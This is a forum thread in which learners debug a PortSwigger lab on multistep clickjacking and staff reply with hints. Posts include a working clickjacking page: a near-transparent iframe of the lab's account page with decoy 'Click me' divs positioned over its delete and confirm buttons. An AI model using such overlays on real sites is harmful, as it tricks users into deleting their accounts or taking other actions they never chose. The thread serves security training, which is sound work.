Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Multistep clickjacking lab not solving

Piyush | Last updated: Apr 28, 2021 07:58PM UTC

Dear Team, wonderfull course but i am stuck here at this lab not able to go ahead , i have aligned all the buttons in chrome and its not working fine, kindly provide suggestions. my code:- --------------------------------------------------- <style> iframe { position:relative; width: 500px; height: 700px; opacity: 0.1; z-index: 2; } .firstClick, .secondClick { position:absolute; top: 495px; left: 50px; z-index: 1; } .secondClick { top: 290px; left: 205px; } </style> <div class="firstClick">Click me first</div> <div class="secondClick">Click me next</div> <iframe src="https://acd21f641ffbb46380f54f5b00b600a1.web-security-academy.net/my-account?id=wiener"></iframe> ------------------------------------------------- Have tried 10 times

Piyush | Last updated: Apr 29, 2021 06:55AM UTC

hi , can somebody update please. Regards, Piyush

Ben, PortSwigger Agent | Last updated: Apr 29, 2021 07:19AM UTC

Hi, You do not need to use the id parameter in your iframe src URL in order to solve the lab successfully - so, instead, would just use something like the following: <iframe src="https://acd21f641ffbb46380f54f5b00b600a1.web-security-academy.net/my-account></iframe>

Piyush | Last updated: Apr 29, 2021 07:28AM UTC

thanks ben appreciate it, got solved :)

kashish | Last updated: Jan 31, 2022 12:31PM UTC

I am facing the same issue and i tried editing the URL the way it was recommended above still no success

Ben, PortSwigger Agent | Last updated: Jan 31, 2022 06:51PM UTC

Hi Kashish, I have just replied to the new forum post that you have created about this but, to reiterate what was said there, you are not correctly lining up your 'click me' elements to take into account that the deletion process is a two stage process. You need to trick the user into clicking the initial 'Delete' button followed by the subsequent 'Yes' button (that only appears after the 'Delete button has been clicked) in order to successfully trick the victim user and solve the lab.

François | Last updated: Oct 26, 2022 04:16PM UTC

Hi guys, I have alse the issue, whereas everything is correctly aligned. I did the test with Firefox and Chrome. Finally I forced the values present in the first post and that solved the challenge, although the buttons were not aligned anymore. --------------------------------------- .firstClick, .secondClick { position:absolute; top: 495px; left: 50px; z-index: 1; } .secondClick { top: 290px; left: 205px; }

Ben, PortSwigger Agent | Last updated: Oct 27, 2022 09:36AM UTC